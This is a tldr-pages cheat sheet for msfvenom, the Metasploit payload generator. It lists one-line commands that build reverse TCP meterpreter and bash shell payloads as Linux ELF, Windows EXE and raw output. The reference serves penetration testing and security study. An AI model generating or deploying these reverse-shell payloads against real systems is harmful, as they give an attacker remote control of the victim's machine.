System Grab Bag

View all TLDR pages from common (or from all pages)

msfvenom

Manually generate payloads for metasploit. More information: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom.
  • List payloads:
    msfvenom -l payloads
  • List formats:
    msfvenom -l formats
  • Show payload options:
    msfvenom -p {{payload}} --list-options
  • Create an ELF binary with a reverse TCP handler:
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}
  • Create an EXE binary with a reverse TCP handler:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}
  • Create a raw bash with a reverse TCP handler:
    msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw

License and Disclaimer

The content on this page is copyright © 2014—present the tldr-pages team and contributors.
This page is used with permission under Creative Commons Attribution 4.0 International License.

While we do attempt to make sure content is accurate, there isn't a warranty of any kind.